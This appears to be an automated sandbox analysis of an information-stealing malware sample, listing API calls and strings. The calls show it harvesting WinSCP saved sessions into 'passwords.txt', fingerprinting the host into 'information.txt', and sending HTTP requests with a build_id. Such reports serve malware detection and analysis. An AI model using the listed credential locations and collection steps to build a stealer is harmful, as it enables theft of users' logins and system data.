                                                                                    • memset.MSVCRT ref: 0040E7E6
                                                                                    • memset.MSVCRT ref: 0040E806
                                                                                    • memset.MSVCRT ref: 0040E81A
                                                                                    • memset.MSVCRT ref: 0040E82E
                                                                                    • memset.MSVCRT ref: 0040E83D
                                                                                    • memset.MSVCRT ref: 0040E84B
                                                                                    • memset.MSVCRT ref: 0040E85C
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C37), ref: 0040E9A2
                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$Value$Open$EnumH_prolog
                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                    • API String ID: 784052110-2798830873
                                                                                    • Opcode ID: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                                    • Instruction ID: d618dc23c2e72a82e05694064c6b478e31e9db7f730d5c61c806b48b50ccc5c5
                                                                                    • Opcode Fuzzy Hash: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                                    • Instruction Fuzzy Hash: DBF11CB1D0025DAEDB11EBE1CC81FEEBB7CAF18304F5441BAE515B2182DB785A48CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00414609
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004264F6), ref: 0040FC46
                                                                                      • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC4D
                                                                                      • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC59
                                                                                      • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                                      • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                                      • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                                      • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                      • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004265A8,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042659C,00000000), ref: 00414922
                                                                                      • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                      • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                      • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                      • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                      • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                      • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                                      • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                      • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                      • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                                      • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                      • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                                      • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                                      • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                      • Part of subcall function 00410925: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                                      • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                      • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000), ref: 0040FC09
                                                                                      • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                                      • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                      • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                      • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                      • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?), ref: 004103E2
                                                                                      • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?,00000000), ref: 004103E9
                                                                                      • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                                      • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                                      • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                      • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                      • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                      • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                      • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                      • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                      • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                                      • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                                      • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                                      • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                      • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                      • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                                      • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                                      • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                                      • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                                      • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                                      • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                      • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                      • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                                      • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                                      • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                                      • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                      • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                      • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                      • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                      • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                                      • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                      • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                      • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,004266F0,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004266E0), ref: 0041537A
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                    • API String ID: 722754166-3257470747
                                                                                    • Opcode ID: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                                    • Instruction ID: 34389346271f1e4f7fe34ee782a08fd334c824368f8c7b7c5cb1de368f42fff1
                                                                                    • Opcode Fuzzy Hash: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                                    • Instruction Fuzzy Hash: 7C921EB190424DE9CB15E7E1C952BEEBB789F24308F5041BEE505725C2DE782B8CCAB5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C280
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B4C,?,?,?,00425B46,?,00000000), ref: 0040C378
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                    • lstrcat.KERNEL32(00000000,00425B50), ref: 0040C4A7
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                    • lstrcat.KERNEL32(00000000,00425B54), ref: 0040C4C7
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                    • lstrcat.KERNEL32(00000000,00425B58), ref: 0040C4F6
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                    • lstrcat.KERNEL32(00000000,00425B5C), ref: 0040C525
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                    • lstrcat.KERNEL32(00000000,00425B60), ref: 0040C554
                                                                                    • lstrcat.KERNEL32(00000000,00425B64), ref: 0040C562
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                    • memset.MSVCRT ref: 0040C5E9
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                    • String ID: passwords.txt
                                                                                    • API String ID: 3298853120-347816968
                                                                                    • Opcode ID: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                    • Instruction ID: 1ecdebe3f11d8fac3e9d0efa643fe933af64b4fe52e77a22e07e9b20bef025ed
                                                                                    • Opcode Fuzzy Hash: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                    • Instruction Fuzzy Hash: 98C16971800159EEDB15EBE4ED1AEEEBB75BF18304F10403AF511721E1DB782A09DB25

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                                      • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                    • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 1345713276-3681523784
                                                                                    • Opcode ID: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                                    • Instruction ID: ba2ef69668dbee3cc8c09a903ddfb9f5b99e769ff53e208b1ce9b21879ea8b17
                                                                                    • Opcode Fuzzy Hash: 505f916443a8155cce969c46bc05582c1e74d202306969a7660cc8c93faf51c3
                                                                                    • Instruction Fuzzy Hash: 596263B0904248EADB10EBE5C956BDEBBB89F19304F5041BEF445B32C1DB785B4C8766

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00425975,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
